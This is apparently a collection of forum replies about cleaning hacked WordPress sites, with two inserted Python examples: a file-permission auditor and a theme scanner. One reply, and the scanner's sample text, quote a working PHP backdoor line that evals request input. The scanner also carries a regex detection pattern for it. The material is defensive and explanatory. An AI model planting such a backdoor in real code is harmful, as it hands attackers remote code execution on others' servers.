Daniel Cid
Forum Replies Created
Forum: Fixing WordPress
In reply to: Spam content and links got inserted into my blog posts
Check your permissions. If you are on a shared server, double check them 🙂
As far as the links inserted, were those the ones (from basicpills)?
http://blog.sucuri.net/2011/03/link-injection-basicpills-com-and-blackhat-seo-spam.html
Btw, where do you host it?
thanks,
Forum: Fixing WordPress
In reply to: Website hacked
Do you know that 444 = Read permissions to the owner, group and EVERYONE? 🙂
On shared hosts, I really recommend 400 or 440 for the wp-config.php, otherwise everyone can read it.
thanks,
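Added example, not part of the original post: a Python check for the permission problem described above, flagging a wp-config.php whose "other" read bit is set (as with 444) while accepting 400 and 440. The function names and the extra world-writable check are assumptions of this example.

```python
import os
import stat
import tempfile

def mode_findings(name, mode):
    """Return a list of permission problems for one file (name, st_mode)."""
    perms = stat.S_IMODE(mode)
    findings = []
    # 444 sets the "other" read bit, so every account on a shared host
    # can read the DB credentials; 400 and 440 leave that bit clear.
    if name == "wp-config.php" and perms & stat.S_IROTH:
        findings.append("readable by everyone (%03o): use 400 or 440" % perms)
    # Assumption of this example: world-writable is a problem for any file.
    if perms & stat.S_IWOTH:
        findings.append("writable by everyone (%03o)" % perms)
    return findings

def audit_tree(root):
    """Walk a WordPress directory; map relative path -> findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: do not follow symlinks
            if stat.S_ISREG(st.st_mode):
                found = mode_findings(name, st.st_mode)
                if found:
                    report[os.path.relpath(path, root)] = found
    return report

if __name__ == "__main__":
    # Constructed sample tree, not taken from any real site.
    with tempfile.TemporaryDirectory() as root:
        for name, mode in (("wp-config.php", 0o444), ("index.php", 0o644)):
            path = os.path.join(root, name)
            open(path, "w").close()
            os.chmod(path, mode)
        for path, found in audit_tree(root).items():
            print(path, found)
```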
Forum: Fixing WordPress
In reply to: Website hacked
You can if the permissions are not set correctly. Check the permissions of all your files (especially the wp-config.php). If they are not set properly, the attackers will just read the new pass from there and hack again.
*Also check for backdoors, which are very common in this type of attack.
Forum: Fixing WordPress
In reply to: Website hacked
Btw, the real actions to take against them are the following:
1-Report to Google. They do that for SEO reasons. If Google blocks them, they lose.
2-The best way to report is to ping http://twitter.com/mattcutts on Twitter (works at Google). If more people sent him this thread and this post: http://blog.sucuri.net/2011/03/link-injection-basicpills-com-and-blackhat-seo-spam.html they might do something.
3-I wish I could share a clean up script, but it is integrated with our package (since it needs access to the db, has a bunch of variations, etc), and I can’t share everything… Sharing only that part won’t work as well because of the dependencies.
*btw, if you can’t clean up, I suggest just restoring all posts to a previous version (using the revision option).
Forum: Fixing WordPress
In reply to: Virus alert and white space
Clayton: That bit of code at the top is malicious even though it looks legit.
Post some details about it here:
http://sucuri.net/malware/malware-entry-mwjs612
*seeing some other sites infected with it.
Forum: Fixing WordPress
In reply to: Website hacked
I did a quick post explaining it… We are seeing A LOT of infected sites:
http://blog.sucuri.net/2011/03/link-injection-basicpills-com-and-blackhat-seo-spam.html
Still trying to track how they got access to the database. Can anyone affected tell us:
-Where they are hosting
-WP version
-List of used plugins?
Forum: Fixing WordPress
In reply to: Website hacked
pubblivori: We have some SQL code to clean it out, basically it infects all posts in the database.
This is what we noticed on the infected sites that we analyzed:
1-The DB user/pass was stolen (somehow). Generally bad permissions of the wp-config.php.
2-All were on shared servers.
3-A new admin user name was created.
So, the first step is to change the DB user/pass, check for malicious users and fix permissions.
Then worry about cleaning up the spam, otherwise they will just add those again.
thanks,
Forum: Fixing WordPress
In reply to: Website hacked
This kind of hack is a bit different and these instructions won’t help much 🙂
What we saw is that the shared server itself was compromised, allowing the attackers to inject links directly in the DB.
Forum: Fixing WordPress
In reply to: Website hacked
Those are added directly to the database, so you have to go post by post and remove them. Very annoying.
Are you hosting on dreamhost?
thanks,
Forum: Fixing WordPress
In reply to: Malicious code in index.php keeps coming back
This is the malware you have:
http://blog.sucuri.net/2011/02/the-attack-from-the-ccs-domains-considered-harmful.html
And it also comes together with a backdoor hidden in your themes. So search all your theme files for:
if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));
*that's the backdoor associated with this malware.
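Added example, not part of the original post: a Python scanner that searches a themes directory for the backdoor line quoted above. It goes slightly beyond the exact string by tolerating spacing, either quote style, another parameter name and the other PHP request arrays; those variants, the function names and the sample text are assumptions of this example.

```python
import os
import re

# Shape of the quoted backdoor: eval(stripslashes($_REQUEST['asc'])).
# Assumption: variants keep that shape but may change spacing, quotes,
# the parameter name, or the request array used.
BACKDOOR_RE = re.compile(
    r"""eval\s*\(\s*stripslashes\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\[\s*(['"])(\w+)\1\s*\]""",
    re.IGNORECASE,
)

def scan_text(text):
    """Return (line_number, parameter_name) for every matching line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = BACKDOOR_RE.search(line)
        if match:
            hits.append((lineno, match.group(2)))
    return hits

def scan_themes(themes_dir):
    """Scan every file under themes_dir; return (path, line, parameter)."""
    findings = []
    for dirpath, _dirs, files in os.walk(themes_dir):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            # errors="replace" keeps the scan going on non-UTF-8 files.
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                for lineno, param in scan_text(fh.read()):
                    rel = os.path.relpath(path, themes_dir)
                    findings.append((rel, lineno, param))
    return findings

# Constructed sample of an infected theme file (not from a real site).
SAMPLE = (
    "<?php\n"
    "get_header();\n"
    "if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));\n"
    "?>\n"
)

if __name__ == "__main__":
    print(scan_text(SAMPLE))
```

Point `scan_themes` at `wp-content/themes` and review every hit by hand before deleting anything.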
Forum: Fixing WordPress
In reply to: Virus: Redircts on Blog Posts, Unknown Code in Quickpress
Your site is still infected:
http://sitecheck.sucuri.net/scanner/?scan=http://migrationology.com/
It seems to be a new malware affecting GoDaddy shared servers today… We already saw a few sites with it:
http://blog.sucuri.net/2011/02/hilary-kneber-godaddy-and-welcometotheglobalisnet-com.html
http://sucuri.net/malware/malware-entry-mwgdd5
Thanks,
Forum: Fixing WordPress
In reply to: Problems with 3.0.3
If your site has this PE*.php file, then your site is hacked and probably displaying malware to your visitors…
It basically acts as a backdoor and creates a new document.write to one of your javascript files to send malware to visitors of your site.
What is interesting is that it only shows the malware once a day per IP and only to Windows/IE users… Making it harder for the site owner to notice.
This is the code displayed to the users:
http://sucuri.net/malware/entry/MW:JS:457
*just as a curiosity, for the people affected, were your sites hacked in the past?
thanks,
Forum: Fixing WordPress
In reply to: is this a virus
Yes, it is a malware used to attack many sites (as part of a spam bot net).
Some details here:
http://blog.sucuri.net/2010/08/cleaning-the-siteurlpath-hack-on-wordpress-wplinksforwork-and-hemoviestube-spam-bots.html
Thanks,
Forum: Fixing WordPress
In reply to: siteurlpath needed in wp_options?
A bit of an old thread, but I posted some details about this attack:
Hope it is useful for anyone having to deal with this attack.
Forum: Fixing WordPress
In reply to: 2.9.2 site hacked
nims: I don’t think there is anything you can do, since those are mass attacks against hosting companies.
It looks like Godaddy fixed their servers, since no one else got hacked there. However, Bluehost and dreamhost keep getting hacked. The last one was from whereis dudescars .com: